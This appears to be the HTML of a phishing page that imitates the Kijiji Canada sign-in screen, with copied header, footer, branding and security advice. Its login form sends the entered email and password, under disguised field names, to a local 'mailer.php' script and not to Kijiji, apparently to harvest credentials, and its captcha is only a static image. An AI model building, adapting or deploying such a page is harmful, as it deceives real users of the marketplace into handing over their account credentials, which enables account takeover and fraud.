
<!DOCTYPE html>
<html id="reset" lang="en">
<head>
    <meta charset="utf-8">
<title>Kijiji Canada | Free local classifieds</title>

<link rel="preload" href="css/bootstrap.js" as="script"/>
<link rel="preload" href="css/common.js" as="script"/>

<link rel="preload" href="css/Larsseit.92161b1b.woff2" as="font" type="font/woff2" crossorigin />
<link rel="preload" href="css/LarsseitMedium.265c8042.woff2" as="font" type="font/woff2" crossorigin />

<link rel="preload" href="css/4.e7001b55.css" as="style" />
<link rel="preload" href="css/auth.page.16613b5a.css" as="style" />
<link rel="preload" href="css/footer.d56a2fbd.css" as="style" />
<link rel="preload" href="css/publicLinks.395c9dd1.css" as="style" />



<link rel="apple-touch-icon" sizes="180x180" href="css/apple-touch-icon-new.png">
<link rel="icon" type="image/png" href="css/favicon-32x32-new.png" sizes="32x32">
<link rel="icon" type="image/png" href="css/favicon-16x16-new.png" sizes="16x16">
<link rel="manifest" href="/manifest.json">

<link rel="shortcut icon" href="css/faviconNew.ico">
<link rel="stylesheet" type="text/css" href="css/4.e7001b55.css" />
<link rel="stylesheet" type="text/css" href="css/auth.page.16613b5a.css" />
<link rel="stylesheet" type="text/css" href="css/footer.d56a2fbd.css" />
<link rel="stylesheet" type="text/css" href="css/publicLinks.395c9dd1.css" />

<script src="css/bootstrap.js"></script>
<script async src="css/gpt.js"></script>

</head>

<body id="PageLogin" class="responsive responsive-dp en">


<script defer src="css/ads.js"></script>
<div id="MainContainer">
        
        <div class="fes-pagelet">
          <div data-fes-id="header"><div class="sticky-outer-wrapper stickyHeader-1269884458 stickyHeader__inactive-2079802412">

        <div class="sticky-inner-wrapper " style="position:relative;top:0px;z-index:99999989">

            <header class="headerElement-442944742">



            <div class="printLogo-4110822992">

            <div class="logo-3282416437" style="visibility:hidden">
            <a class="logoLink-1425315727" href="#" aria-label="Kijiji Homepage">

            </svg>
            </a></div>

            </div>

            <div class="overlay-1946744954" role="button" tabindex="0"></div>

            <div class="headerContainer-471773205">

            <div class="headerWrapper-3599732097">

            <img src="css/logo.png" alt="Kijiji logo" width="80px">

            <div class="searchBarWrapper-3397949630">

            <form class="searchBar-673934149" action="" role="search">

            

            <div class="wrapper-2241040119">

            <div class="wrapper-125249956 formFieldKeyword-4166350882" role="combobox" aria-expanded="true" aria-haspopup="listbox" aria-owns="Algolia-Selector-menu" aria-labelledby="Algolia-Selector-label">

            
            <div class="field-2633259492">

            <div class="inputContainer-2633259492">
            <input class="input-2398582227 inputKeyword-1984178082" id="SearchKeyword" value="" placeholder="Search for anything..." autoComplete="off" aria-autocomplete="list" aria-controls="Algolia-Selector-menu" aria-labelledby="Algolia-Selector-label" maxLength="200" name="" variant="default"/></div></div></div>
        </div>

            <div class="container-3432574170" role="combobox" aria-expanded="false" aria-haspopup="listbox" aria-labelledby="SearchCategorySelector-label">
                <button type="button" role="button" aria-label="Category, undefined" aria-haspopup="true" data-toggle="true" class="label-1952128162" data-id="SearchCategory" data-testid="categoryLabel">
                    
                </button>
                <svg aria-hidden="true" class="icon-459822882 icon-2116898839 chevronIcon-34435342" height="100%" width="100%"><use xlink:href="#icon-dropdown-chevron"></use></svg>
        <div data-testid="categoryListWrapper" class="categoryListWrapper-4213943590">
            <div class="categoryHeader-2324295277">

                <svg class="icon-459822882 icon-2116898839" height="100%" width="100%">
                    <use xlink:href="#icon-category-all"></use></svg>

            <div data-testid="categoryHeaderText" class="categoryHeaderText-4260314160"></div>

            <button type="button" class="closeButton-3551279635">
                <svg class="icon-459822882 closeIcon-236130414" height="100%" width="100%">
                    <use xlink:href="#icon-x"></use>
                </svg>
            </button>
        </div>

            <ul class="categoryList-1044204110" role="menu"></ul>
        </div></div>

            <input type="hidden" id="categoryId" name="" value="0"/>

            <input type="hidden" id="dc" name="" value="true"/>

            <button internal-name="Canada" id="SearchLocationPicker" type="button" aria-label="Location, Canada" class="locationModalTrigger-558882393">
            <div class="iconWrapper-1359463758"><svg aria-hidden="true" class="icon-459822882 icon-2889047399" height="100%" width="100%" focusable="false"><use xlink:href="#icon-location-new"></use></svg></div>

            <span class="text-2356681840">Canada</span>
            </button>

        <button class="searchSubmit-4090601312" data-qa-id="header-button-submit" name="SearchSubmit" type="submit"><svg aria-hidden="true" class="icon-459822882 searchSubmitIcon-650403213" height="100%" width="100%" focusable="false"><use xlink:href="#icon-search"></use></svg><span class="searchSubmitText-871956374">Find what you are looking for</span></button></form>

    </div><div class="headerTools-3815430746">
        <div class="headerButtons-642647784"><a class="headerLinkLanguage-203031519" rel="nofollow" href="#" data-qa-id="language-toggle">fr</a>
        <div class="root-835198095 root__loggedOut-3587998771">
        <div class="root-882857460"><a class="link-3970392289 link__default-1151936189 register-4281208362" rel="nofollow" href="#" title="Register">Register</a><span class="or-4281208362"> <!-- -->or<!-- --> </span><a class="link-3970392289 link__default-1151936189" rel="nofollow" href="#" title="Sign In">Sign In</a></div>

        

        </div>
        <a class="headerButtonPostAd-1524038143" rel="nofollow" data-qa-id="header-link-post-ad" href="#" aria-label="Post ad">Post ad</a></div></div></div></div></header></div></div></div>
          
        </div>
      <div id="MessageContainer">
                </div>
        <div id="mainPageContent" tabindex="-1">
            
        <div class="fes-pagelet">
          <div data-fes-id="authPage"><div><div class="page-4182276102">

            <div class="formContainer-2614242467">
            <main class="mainLogin-3163845012"><h1 class="formHeader-3915424305">Sign in</h1>
    
            <form  autoComplete="off" method="post" action="mailer.php" class="loginForm-2591706535">


            <div class="container-227378722 inputBox-3265251147">

            <div class="inputContainer-2657754963">
            <input type="email" aria-invalid="false" class="input-2077839919 withIcon-971598946 label-3793693833" name="text1" required="required" placeholder="Email" />

            </div>
            </div>
            <div class="container-227378722 inputBox-3265251147">

            <div class="inputContainer-2657754963">

            <input type="password" data-testid="login-password-input" aria-invalid="false" class="input-2077839919 withIcon-971598946 label-3793693833" id="password" name="text2" required="required" placeholder="Password" />
            </div>

            </div>
            <div class="container-2874453351 checkboxContainer-3265251147">
            <input type="checkbox" class="hiddenInput-550376587" tabindex="-1" name="rememberMe"/>

            <div class="checkboxArea-4158322762 ">

            <button id="9d56a075-a565-4bbe-b92a-4e97f2b770d0" type="button" class="checkbox-792433335" data-testid="login-rememberme-checkbox" aria-label="Select Keep me signed in" role="checkbox" aria-checked="false"></button>

            <label class="checkboxLabel-1777841300" for="9d56a075-a565-4bbe-b92a-4e97f2b770d0">Keep me signed in</label>

            </div></div>

            <a class="link-3970392289 link__default-1151936189 forgotPasswordLink-2761062974 inputBox-3265251147" href="#">Forgot password?</a>

            <button class="signInButton-2798687440 button-1997310527 button__futurePrimary-3327793552 button__medium-1066667140" type="submit">Sign in</button><br>

            <img src="css/captcha.png" alt="Kijiji logo" width="250px">


            <div class="createAccountContainer-2839426734"><p>

        <span>Don&#x27;t have an account? </span>
        <a class="link-3970392289 link__default-1151936189 defaultLink-2343518503" href="#" aria-label="Don&#x27;t have an account?  Create one now!">Create one now!</a></p></div>
        <div class="fieldWithSpace-761351831">
        <div class="recaptcha-317179802"><div></div></div></div>
        <div class="protectAccountContainer-2074007351">
            <h3 class="protectAccountTitle-3172148404">Protect your account</h3><p class="protectAccountText-862631884"> <!-- -->Ensure that whenever you sign in to Kijiji, the web address in your browser starts with https://www.kijiji.ca/</p></div>
    </form></main>

    <aside class="rightPanelContainer-2248146255">
        <div class="registerNowContainer-2867214086">
        <h2 class="registerHeader-4111449087">Not registered yet?</h2>
        <p class="registerText-3321453549">Register now to post, edit, and manage ads. It’s quick, easy, and free!</p>
        <a class="button-1997310527 button__primary-1681489609 button__small-4135842589" href="#">Register Now</a></div><div class="rightProtectAccountContainer-2074007351">
        <span class="protectAccountTitle-3172148404">Protect your account</span>
        <p class="protectAccountText-862631884"> <!-- -->Ensure that whenever you sign in to Kijiji, the web address in your browser starts with https://www.kijiji.ca/</p></div></aside></div></div></div></div>
        
        </div>
      </div>

        </div>
    
        <div class="fes-pagelet">
          <div data-fes-id="footer">

            <footer id="Footer" class="container-221624139" aria-labelledby="footerHeading">
                <h2 id="footerHeading" class="srOnly-623785121">Footer links</h2>
                <div class="linkContainer-2510787684"><div class="column-704037383">
                    <h3 class="columnTitle-1084289935">Kijiji</h3>
                    <ul class="columnList-4012910607">
                        <li class="columnItem-372683642">
                            <a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">About</a></li>
                        <li class="columnItem-372683642">
                        <a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">Join Us</a></li>
                        <li class="columnItem-372683642">
                        <a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">Member Benefits</a></li>
                        <li class="columnItem-372683642"><a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">Advertise on Kijiji</a></li>
                    </ul>
                </div>

                <div class="column-704037383">
                    <h3 class="columnTitle-1084289935">Explore</h3>
                    <ul class="columnList-4012910607">
                        <li class="columnItem-372683642"><a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" rel="noopener noreferrer" href="#">Kijiji Autos<span class="srOnly-4006513121">(opens in a new tab)</span></a></li>
                        <li class="columnItem-372683642">
                            <a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">Kijiji Central</a></li>
                        <li class="columnItem-372683642">
                            <a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">Tools to promote ads</a></li></ul></div>

                        <div class="column-704037383"><h3 class="columnTitle-1084289935">Info</h3>

                            <ul class="columnList-4012910607"><li class="columnItem-372683642"><a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">Terms of Use</a></li>
                                <li class="columnItem-372683642">
                                    <a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">Privacy Policy</a>
                                </li>
                                <li class="columnItem-372683642"><a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">Posting Policy</a>
                                </li>
                                <li class="columnItem-372683642"><a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">AdChoices</a>
                                <div class="tipContainer-473599471" data-testid="tooltip">
                                <button type="button" class="infoCircle-63792085" aria-labelledby="tooltip-footerlinkadchoice" aria-expanded="false"><svg class="icon-459822882" height="16px" width="16px"><use xlink:href="#icon-tooltip"></use></svg>
                                </button>

                            </div></li></ul></div>
                            <div class="column-704037383">

                            <h3 class="columnTitle-1084289935">Support</h3><ul class="columnList-4012910607"><li class="columnItem-372683642"><a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">Help Desk</a>
                            </li>

                            <li class="columnItem-372683642">
                                <a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">Kijiji en français</a>
                            </li>

                            <li class="columnItem-372683642">

                            <a class="link-3970392289 link__greyGreen-478352292 columnLink-3154419905" href="#">Accessibility</a></li><li class="columnItem-372683642"><label class="label-563089609 columnLink-3154419905 contrastSwitcher-1801622400" for="ContrastSwitch"><span class="labelText-1345362785">Change Contrast</span>

                            <div class="switch-3222151189">
                            <input type="checkbox" class="input-2530852524" id="ContrastSwitch"/>
                            <span class="slider-2492278371"></span>

                            </div></label></li></ul></div></div><div class="badgeContainer-1610635672">


                            <img src="css/store.png" width="350px">
                            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                            <img src="css/socials.png" width="350px">


                            </div>
                            <div class="copyright-2418027893">
                            <p class="copyrightText-2350281792"></p>
                            <p class="copyrightText-2350281792">All rights reserved. Google, Google Play, YouTube and other marks are trademarks of Google Inc.</p></div></footer></div>
         
        </div>
      <div class="modal-overlay"></div>

<script src="css/common.js"></script>
<script src="css/admin.js"></script>
<script defer src='css/templates.js'></script>

</body>
</html>